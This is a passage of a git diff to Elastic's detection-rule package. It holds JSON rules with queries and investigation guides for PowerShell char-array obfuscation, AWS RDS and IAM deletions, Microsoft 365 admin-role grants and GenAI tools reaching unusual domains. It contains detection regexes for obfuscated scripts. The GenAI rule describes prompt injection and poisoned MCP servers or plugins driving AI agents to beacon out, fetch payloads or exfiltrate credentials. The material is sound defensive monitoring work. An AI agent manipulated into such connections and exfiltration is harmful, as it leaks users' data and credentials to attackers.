PowerShell scripts from trusted sources or vendors might use character arrays for legitimate obfuscation to protect intellectual property. Verify the script's origin and check for digital signatures or hashes to confirm authenticity.\n- Automated scripts generated by development tools or frameworks could include character array manipulation as part of their standard output. Identify and whitelist these tools if they are commonly used in your environment.\n- Security tools or monitoring solutions might use character arrays in their scripts for legitimate purposes. Cross-reference with known security software and consider excluding these from the detection rule if they are verified as safe.\n- Regularly update the exclusion list to include new trusted scripts or tools as they are introduced into the environment, ensuring that legitimate activities are not flagged as false positives.\n\n### Response and remediation\n\n- Isolate the affected host immediately to prevent further spread of potentially malicious scripts or unauthorized access.\n- Terminate any suspicious PowerShell processes identified by the alert to halt ongoing obfuscation activities.\n- Conduct a thorough review of the script block text and associated logs to identify any malicious payloads or commands executed.\n- Remove any identified malicious scripts or files from the affected system to prevent re-execution.\n- Reset credentials for any user accounts involved in the alert to mitigate potential credential compromise.\n- Update endpoint protection and ensure that AMSI and other security features are fully enabled and configured to detect similar threats.\n- Escalate the incident to the security operations center (SOC) for further analysis and to determine if additional systems are affected.\n", + "query": "from logs-windows.powershell_operational* metadata _id, _version, _index\n| where event.code == \"4104\"\n\n// Filter for scripts that contain the \"char\" keyword using MATCH, boosts the query performance\n| where powershell.file.script_block_text : \"char\"\n\n// replace the patterns we are looking for with the \ud83d\udd25 emoji to enable counting them\n// The emoji is used because it's unlikely to appear in scripts and has a consistent character length of 1\n| eval Esql.script_block_tmp = replace(\n powershell.file.script_block_text,\n \"\"\"(char\\[\\]\\]\\(\\d+,\\d+[^)]+|(\\s?\\(\\[char\\]\\d+\\s?\\)\\+){2,})\"\"\",\n \"\ud83d\udd25\"\n)\n\n// count how many patterns were detected by calculating the number of \ud83d\udd25 characters inserted\n| eval Esql.script_block_pattern_count = length(Esql.script_block_tmp) - length(replace(Esql.script_block_tmp, \"\ud83d\udd25\", \"\"))\n\n// keep the fields relevant to the query, although this is not needed as the alert is populated using _id\n| keep\n Esql.script_block_pattern_count,\n Esql.script_block_tmp,\n powershell.file.*,\n file.path,\n powershell.sequence,\n powershell.total,\n _id,\n _index,\n host.name,\n agent.id,\n user.id\n\n// Filter for scripts that match the pattern at least once\n| where Esql.script_block_pattern_count >= 1\n", + "related_integrations": [ + { + "package": "windows", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Esql.script_block_pattern_count", + "type": "integer" + }, + { + "ecs": false, + "name": "Esql.script_block_tmp", + "type": "keyword" + }, + { + "ecs": false, + "name": "_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "_index", + "type": "keyword" + }, + { + "ecs": true, + "name": "agent.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_entropy_bits", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_hash", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_id", + "type": "keyword" + }, + { + "ecs": false, + "name": "powershell.file.script_block_length", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.file.script_block_surprisal_stdev", + "type": "double" + }, + { + "ecs": false, + "name": "powershell.file.script_block_text", + "type": "text" + }, + { + "ecs": false, + "name": "powershell.file.script_block_unique_symbols", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.sequence", + "type": "long" + }, + { + "ecs": false, + "name": "powershell.total", + "type": "long" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "85e2d45e-a3df-4acf-83d3-21805f564ff4", + "setup": "## Setup\n\nThe 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: PowerShell Logs", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1027", + "name": "Obfuscated Files or Information", + "reference": "https://attack.mitre.org/techniques/T1027/" + }, + { + "id": "T1140", + "name": "Deobfuscate/Decode Files or Information", + "reference": "https://attack.mitre.org/techniques/T1140/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.001", + "name": "PowerShell", + "reference": "https://attack.mitre.org/techniques/T1059/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "esql", + "version": 5 + }, + "id": "85e2d45e-a3df-4acf-83d3-21805f564ff4_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_207.json b/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_207.json deleted file mode 100644 index ee86921b364..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/863cdf31-7fd3-41cf-a185-681237ea277b_207.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic", - "Austin Songer" - ], - "description": "Identifies the deletion of an Amazon Relational Database Service (RDS) Security group.", - "false_positives": [ - "An RDS security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS RDS Security Group Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS RDS Security Group Deletion\n\nAmazon RDS Security Groups control access to RDS instances, acting as a virtual firewall. Adversaries may delete these groups to disrupt database access or cover their tracks. The detection rule monitors AWS CloudTrail logs for successful deletion events of RDS Security Groups, signaling potential unauthorized activity. This helps security analysts quickly identify and respond to suspicious deletions.\n\n### Possible investigation steps\n\n- Review the AWS CloudTrail logs to confirm the event details, focusing on the event.provider:rds.amazonaws.com and event.action:DeleteDBSecurityGroup fields to ensure the deletion event is accurately captured.\n- Identify the user or role associated with the event by examining the user identity information in the CloudTrail logs to determine if the action was performed by an authorized entity.\n- Check the event time and correlate it with other security events or alerts to identify any suspicious activity patterns or sequences that might indicate a broader attack.\n- Investigate the context of the deletion by reviewing recent changes or activities in the AWS account, such as modifications to IAM policies or unusual login attempts, to assess if the deletion is part of a larger unauthorized access attempt.\n- Contact the relevant database or cloud infrastructure team to verify if the deletion was intentional and authorized, ensuring that it aligns with any ongoing maintenance or decommissioning activities.\n\n### False positive analysis\n\n- Routine maintenance activities by authorized personnel may trigger the rule. To manage this, create exceptions for known maintenance windows or specific user accounts that regularly perform these tasks.\n- Automated scripts or tools used for infrastructure management might delete security groups as part of their normal operation. Identify these scripts and exclude their actions from triggering alerts by using specific identifiers or tags.\n- Changes in security group configurations during scheduled updates or migrations can result in deletions. Document these events and adjust the detection rule to ignore deletions during these planned activities.\n- Testing environments often involve frequent creation and deletion of resources, including security groups. Exclude these environments from monitoring by using environment-specific tags or identifiers.\n\n### Response and remediation\n\n- Immediately isolate the affected RDS instance by modifying its security group settings to restrict all inbound and outbound traffic, preventing further unauthorized access.\n- Review AWS CloudTrail logs to identify the source of the deletion request, including the IAM user or role involved, and assess whether the credentials have been compromised.\n- Recreate the deleted RDS Security Group with the appropriate rules and reassign it to the affected RDS instance to restore normal operations.\n- Conduct a thorough audit of IAM permissions to ensure that only authorized personnel have the ability to delete RDS Security Groups, and revoke any unnecessary permissions.\n- Implement multi-factor authentication (MFA) for all IAM users with permissions to modify RDS Security Groups to enhance security and prevent unauthorized changes.\n- Escalate the incident to the security operations team for further investigation and to determine if additional systems or data have been affected.\n- Update incident response plans and security policies based on the findings to prevent similar incidents in the future and improve overall cloud security posture.", - "query": "event.dataset:aws.cloudtrail and event.provider:rds.amazonaws.com and event.action:DeleteDBSecurityGroup and event.outcome:success\n", - "references": [ - "https://docs.aws.amazon.com/AmazonRDS/latest/APIReference/API_DeleteDBSecurityGroup.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "863cdf31-7fd3-41cf-a185-681237ea277b", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS RDS", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1531", - "name": "Account Access Removal", - "reference": "https://attack.mitre.org/techniques/T1531/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "863cdf31-7fd3-41cf-a185-681237ea277b_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_207.json b/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_207.json deleted file mode 100644 index bd09c461c65..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/867616ec-41e5-4edc-ada2-ab13ab45de8a_207.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of a specified AWS Identity and Access Management (IAM) resource group. Deleting a resource group does not delete resources that are members of the group; it only deletes the group structure.", - "false_positives": [ - "A resource group may be deleted by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Resource group deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS IAM Group Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS IAM Group Deletion\n\nAWS IAM groups facilitate user management by organizing users with similar permissions. Adversaries might exploit group deletion to disrupt access controls, potentially leading to unauthorized access or service disruption. The detection rule monitors successful group deletions via AWS CloudTrail, flagging potential misuse by correlating specific IAM actions and outcomes, thus aiding in timely threat identification.\n\n### Possible investigation steps\n\n- Review the AWS CloudTrail logs to identify the user or role that performed the DeleteGroup action by examining the userIdentity field.\n- Check the event time to determine when the group deletion occurred and correlate it with any other suspicious activities around the same timeframe.\n- Investigate the specific IAM group that was deleted to understand its purpose and the permissions it granted by reviewing historical IAM policies and group membership.\n- Assess the impact of the group deletion by identifying any users or services that might have been affected due to the loss of group-based permissions.\n- Verify if the group deletion was authorized by cross-referencing with change management records or contacting the responsible team or individual.\n- Look for any patterns or repeated occurrences of similar actions in the logs to identify potential malicious behavior or misconfigurations.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when IAM groups are deleted as part of regular maintenance or restructuring. To manage this, create exceptions for known maintenance periods or specific administrative accounts.\n- Automated scripts or tools that manage IAM resources might delete groups as part of their normal operation. Identify these scripts and exclude their actions from triggering alerts by using specific user or role identifiers.\n- Temporary groups created for short-term projects or testing purposes might be deleted frequently. Document these groups and exclude their deletion from monitoring by using naming conventions or tags.\n- Changes in organizational structure or policy might necessitate the deletion of certain groups. Coordinate with relevant teams to anticipate these changes and adjust monitoring rules accordingly.\n\n### Response and remediation\n\n- Immediately revoke any active sessions and access keys for users who were part of the deleted IAM group to prevent unauthorized access.\n- Restore the deleted IAM group from a backup or recreate it with the same permissions to ensure continuity of access for legitimate users.\n- Conduct a review of recent IAM activity logs to identify any unauthorized or suspicious actions that may have preceded the group deletion.\n- Notify the security team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional monitoring on IAM activities, especially focusing on group management actions, to detect similar threats in the future.\n- Review and tighten IAM policies and permissions to ensure that only authorized personnel can delete IAM groups.\n- If malicious intent is suspected, escalate the incident to the incident response team for a comprehensive investigation and potential legal action.", - "query": "event.dataset:aws.cloudtrail and event.provider:iam.amazonaws.com and event.action:DeleteGroup and event.outcome:success\n", - "references": [ - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/iam/delete-group.html", - "https://docs.aws.amazon.com/IAM/latest/APIReference/API_DeleteGroup.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 21, - "rule_id": "867616ec-41e5-4edc-ada2-ab13ab45de8a", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "low", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Data Source: AWS IAM", - "Tactic: Impact", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0040", - "name": "Impact", - "reference": "https://attack.mitre.org/tactics/TA0040/" - }, - "technique": [ - { - "id": "T1531", - "name": "Account Access Removal", - "reference": "https://attack.mitre.org/techniques/T1531/" - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "867616ec-41e5-4edc-ada2-ab13ab45de8a_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_209.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_209.json deleted file mode 100644 index 479977d008e..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_209.json +++ /dev/null @@ -1,89 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "In Azure Active Directory (Azure AD), permissions to manage resources are assigned using roles. The Global Administrator is a role that enables users to have access to all administrative features in Azure AD and services that use Azure AD identities like the Microsoft 365 Defender portal, the Microsoft 365 compliance center, Exchange, SharePoint Online, and Skype for Business Online. Attackers can add users as Global Administrators to maintain access and manage all subscriptions and their settings and resources.", - "from": "now-25m", - "index": [ - "filebeat-*", - "logs-o365*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Microsoft 365 Global Administrator Role Assigned", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating Microsoft 365 Global Administrator Role Assigned\n\nThe Microsoft 365 Global Administrator role grants comprehensive administrative access across Azure AD and associated services, enabling full control over resources and settings. Adversaries may exploit this by assigning themselves or others to this role, ensuring persistent access and control. The detection rule identifies such unauthorized assignments by monitoring specific audit events, focusing on role changes to \"Global Administrator,\" thus alerting security teams to potential misuse.\n\n### Possible investigation steps\n\n- Review the audit logs for the event dataset \"o365.audit\" with the event code \"AzureActiveDirectory\" to identify the specific user who was added to the Global Administrator role.\n- Examine the \"event.action\" field to confirm the action \"Add member to role\" and verify the \"o365.audit.ModifiedProperties.Role_DisplayName.NewValue\" to ensure it is \"Global Administrator.\"\n- Identify the user account that performed the role assignment and assess their recent activities and login history for any signs of compromise or unusual behavior.\n- Check the timestamp of the role assignment event to determine if it aligns with any known maintenance windows or authorized administrative activities.\n- Investigate any associated IP addresses or devices used during the role assignment to determine if they are consistent with the user's typical access patterns or if they indicate potential unauthorized access.\n- Review any recent changes to user permissions or roles within Azure AD to identify if there are other suspicious modifications that could indicate broader unauthorized access attempts.\n\n### False positive analysis\n\n- Routine administrative tasks may trigger alerts when legitimate IT staff are assigned the Global Administrator role temporarily for maintenance or configuration changes. To manage this, create exceptions for known IT personnel or scheduled maintenance windows.\n- Automated scripts or third-party applications that require elevated permissions might be flagged if they are set to assign the Global Administrator role as part of their operation. Review and whitelist these scripts or applications if they are verified as safe and necessary.\n- Organizational changes such as mergers or acquisitions can lead to legitimate role assignments that appear suspicious. Implement a review process for role changes during such periods to differentiate between legitimate and unauthorized assignments.\n- Training or onboarding processes for new IT staff might involve temporary Global Administrator access, which could be misinterpreted as a threat. Establish a protocol for temporary access that includes logging and approval to prevent false positives.\n- Changes in role assignments due to policy updates or compliance requirements can also trigger alerts. Ensure that these changes are documented and communicated to the security team to avoid unnecessary investigations.\n\n### Response and remediation\n\n- Immediately remove the unauthorized user from the Global Administrator role to prevent further unauthorized access and control over resources.\n- Conduct a thorough review of recent changes in Azure AD to identify any other unauthorized role assignments or suspicious activities linked to the compromised account.\n- Reset the credentials of the affected account and enforce multi-factor authentication (MFA) to secure the account against further unauthorized access.\n- Notify the security team and relevant stakeholders about the incident, providing details of the unauthorized access and actions taken to mitigate the threat.\n- Implement conditional access policies to restrict administrative role assignments to trusted locations and devices, reducing the risk of unauthorized changes.\n- Review and update access logs and monitoring configurations to ensure comprehensive visibility into role changes and other critical activities in Azure AD.\n- Conduct a post-incident analysis to identify the root cause of the breach and implement additional security measures to prevent similar incidents in the future.", - "query": "event.dataset:o365.audit and event.code:\"AzureActiveDirectory\" and event.action:\"Add member to role.\" and\no365.audit.ModifiedProperties.Role_DisplayName.NewValue:\"Global Administrator\"\n", - "references": [ - "https://docs.microsoft.com/en-us/azure/active-directory/roles/permissions-reference#global-administrator" - ], - "related_integrations": [ - { - "package": "o365", - "version": "^2.11.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.code", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": false, - "name": "o365.audit.ModifiedProperties.Role_DisplayName.NewValue", - "type": "keyword" - } - ], - "risk_score": 47, - "rule_id": "88671231-6626-4e1b-abb7-6e361a171fbb", - "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "medium", - "tags": [ - "Domain: Cloud", - "Data Source: Microsoft 365", - "Use Case: Identity and Access Audit", - "Tactic: Persistence", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0003", - "name": "Persistence", - "reference": "https://attack.mitre.org/tactics/TA0003/" - }, - "technique": [ - { - "id": "T1098", - "name": "Account Manipulation", - "reference": "https://attack.mitre.org/techniques/T1098/", - "subtechnique": [ - { - "id": "T1098.003", - "name": "Additional Cloud Roles", - "reference": "https://attack.mitre.org/techniques/T1098/003/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 209 - }, - "id": "88671231-6626-4e1b-abb7-6e361a171fbb_209", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_212.json b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_212.json index 4340de4931b..1b69b0e123d 100644 --- a/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_212.json +++ b/packages/security_detection_engine/kibana/security_rule/88671231-6626-4e1b-abb7-6e361a171fbb_212.json @@ -21,7 +21,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_1.json b/packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_1.json new file mode 100644 index 00000000000..bbfb3f0e13f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_1.json @@ -0,0 +1,97 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects GenAI tools connecting to unusual domains on macOS. Adversaries may compromise GenAI tools through prompt injection, malicious MCP servers, or poisoned plugins to establish C2 channels or exfiltrate sensitive data to attacker-controlled infrastructure. AI agents with network access can be manipulated to beacon to external servers, download malicious payloads, or transmit harvested credentials and documents.", + "from": "now-9m", + "history_window_start": "now-7d", + "index": [ + "logs-endpoint.events.network*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "GenAI Process Connection to Unusual Domain", + "new_terms_fields": [ + "destination.domain" + ], + "note": "## Triage and analysis\n\n### Investigating GenAI Process Connection to Unusual Domain\n\nGenAI tools with network access can be weaponized to contact attacker infrastructure for C2, data exfiltration, or payload retrieval. Compromised MCP servers, malicious plugins, or prompt injection attacks can redirect AI agents to connect to arbitrary domains. While legitimate GenAI tools connect to vendor APIs and CDNs, connections to unusual domains may indicate exploitation.\n\n### Possible investigation steps\n\n- Review the destination domain to determine if it's a legitimate GenAI service, CDN, package registry, or potentially malicious infrastructure.\n- Investigate the GenAI process command line and configuration to identify what triggered the connection (plugin, MCP server, user prompt).\n- Check if the domain was recently registered, uses a suspicious TLD, or has a low reputation score in threat intelligence feeds.\n- Review the timing and context of the connection to determine if it correlates with user activity or was automated.\n- Examine network traffic to and from the domain to identify the nature of the communication (API calls, file downloads, data exfiltration).\n- Check for other hosts in the environment connecting to the same domain to determine if this is an isolated incident.\n- Investigate whether the GenAI tool's configuration files were recently modified to add new MCP servers or plugins.\n- Correlate with file events to see if the GenAI tool downloaded or created files around the same time as the connection.\n\n### False positive analysis\n\n- GenAI tools may connect to new domains as vendors update their infrastructure, CDNs, or API endpoints.\n- Package managers (npm, pip) used by MCP servers may connect to package registries for dependency resolution.\n- Legitimate MCP servers and AI plugins connect to their respective backend services.\n- Developer workflows testing new AI integrations or MCP servers will naturally trigger alerts for novel domain connections.\n\n### Response and remediation\n\n- If the domain is confirmed malicious, block it at the network level and investigate the source of the compromise.\n- Review the GenAI tool's configuration for unauthorized MCP servers, plugins, or extensions that initiated the connection.\n- Investigate any data that may have been sent to the suspicious domain and assess the potential for data exfiltration.\n- Review and rotate any API keys, tokens, or credentials used by the GenAI tool.\n- Update detection rules to monitor the identified domain across all hosts in the environment.\n", + "query": "event.category:network and host.os.type:macos and\nprocess.name:(\n Claude or \"Claude Helper\" or \"Claude Helper (Plugin)\" or Copilot or Cursor or\n \"Cursor Helper\" or \"Cursor Helper (Plugin)\" or GPT4All or Jan or \"Jan Helper\" or\n KoboldCpp or \"LM Studio\" or Ollama or Windsurf or \"Windsurf Helper\" or\n \"Windsurf Helper (Plugin)\" or bunx or claude or codex or copilot or cursor or deno or\n gemini-cli or genaiscript or gpt4all or grok or jan or koboldcpp or llama-cli or\n llama-server or lmstudio or npx or ollama or pnpm or qwen or textgen or windsurf or yarn\n) and destination.domain:(* and not (\n aka.ms or anthropic.com or atlassian.com or cursor.com or cursor.sh or github.com or\n gpt4all.io or hf.co or huggingface.co or lmstudio.ai or localhost or ollama.ai or\n ollama.com or openai.com or *.aka.ms or *.akamaized.net or *.amazonaws.com or\n *.amplitude.com or *.anthropic.com or *.atlassian.com or *.aws.amazon.com or\n *.azure.com or *.cdn.cloudflare.net or *.cloudflare-dns.com or *.cloudflare.com or\n *.cloudflarestorage.com or *.codeium.com or *.cursor.com or *.cursor.sh or\n *.datadoghq.com or *.elastic-cloud.com or *.elastic.co or *.exp-tas.com or\n *.gemini.google.com or *.generativelanguage.googleapis.com or *.github.com or\n *.githubcopilot.com or *.githubusercontent.com or *.gitkraken.com or *.gitkraken.dev or\n *.google.com or *.googleapis.com or *.gpt4all.io or *.grok.x.ai or *.hf.co or\n *.honeycomb.io or *.huggingface.co or *.intercom.io or *.jan.ai or *.launchdarkly.com or\n *.lmstudio.ai or *.microsoft.com or *.mixpanel.com or *.msedge.net or *.npmjs.com or\n *.npmjs.org or *.ollama.ai or *.ollama.com or *.openai.com or *.pypi.org or\n *.r2.cloudflarestorage.com or *.segment.io or *.sentry.io or *.visualstudio.com or\n *.vsassets.io or *.vscode-cdn.net or *.windsurf.ai or *.x.ai or *.yarnpkg.com\n))\n", + "references": [ + "https://atlas.mitre.org/techniques/AML.T0086", + "https://glama.ai/blog/2025-11-11-the-lethal-trifecta-securing-model-context-protocol-against-data-flow-attacks", + "https://www.elastic.co/security-labs/elastic-advances-llm-security", + "https://specterops.io/blog/2025/11/21/an-evening-with-claude-code" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "9050506c-df6d-4bdf-bc82-fcad0ef1e8c1", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", + "Domain: LLM", + "Mitre Atlas: T0086" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 1 + }, + "id": "9050506c-df6d-4bdf-bc82-fcad0ef1e8c1_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_210.json b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_210.json new file mode 100644 index 00000000000..6a9c89c94c8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/9055ece6-2689-4224-a0e0-b04881e1f8ad_210.json @@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the deletion of an Amazon RDS DB instance, Aurora cluster, or global database cluster. Deleting these resources permanently destroys stored data and can cause major service disruption. Adversaries with sufficient permissions may delete RDS resources to impede recovery, destroy evidence, or inflict operational impact on the environment.", + "false_positives": [ + "RDS instances or clusters may be intentionally deleted by database administrators or during planned decommissioning activities. Verify the user identity, source IP, and change context to ensure the deletion is expected. CloudFormation stack removals and automated cleanup workflows may also trigger these events and can be exempted if known and authorized." + ], + "from": "now-6m", + "index": [ + "filebeat-*", + "logs-aws.cloudtrail-*" + ], + "investigation_fields": { + "field_names": [ + "@timestamp", + "user.name", + "user_agent.original", + "source.ip", + "aws.cloudtrail.user_identity.arn", + "aws.cloudtrail.user_identity.type", + "aws.cloudtrail.user_identity.access_key_id", + "target.entity.id", + "event.action", + "event.outcome", + "cloud.account.id", + "cloud.region", + "aws.cloudtrail.request_parameters", + "aws.cloudtrail.response_elements" + ] + }, + "language": "kuery", + "license": "Elastic License v2", + "name": "AWS RDS DB Instance or Cluster Deleted", + "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. \n> While every effort has been made to ensure its quality, validate and adapt it to suit your operational needs.\n\n### Investigating AWS RDS DB Instance or Cluster Deleted\n\nThis rule detects the deletion of an RDS DB instance, Aurora DB cluster, or global database cluster. These operations permanently remove stored data and backups unless final snapshots are explicitly retained. Adversaries may delete RDS resources as part of a destructive attack, to eliminate forensic evidence, or to disrupt critical workloads. Because deletions are irreversible without backups, immediate review is required to determine whether the action was authorized and assess potential data loss.\n\n#### Possible investigation steps\n\n**Identify the Actor**\n- Review `aws.cloudtrail.user_identity.arn` and `aws.cloudtrail.user_identity.access_key_id` to determine who performed the action.\n- Validate:\n - Is this user/role authorized to delete DB instances or clusters?\n - Does this action align with past behavior?\n\n**Review the Deletion Event**\n- Confirm which action was invoked: `DeleteDBInstance`, `DeleteDBCluster` or `DeleteGlobalCluster`\n- Examine `aws.cloudtrail.request_parameters` and `target.entity.id`. Identify which resource was deleted and whether a final snapshot was created before deletion.\n\n**Analyze Source and Access Context**\n- Check `source.ip`, `source.geo` fields and `user_agent.original`\n- Validate whether:\n - 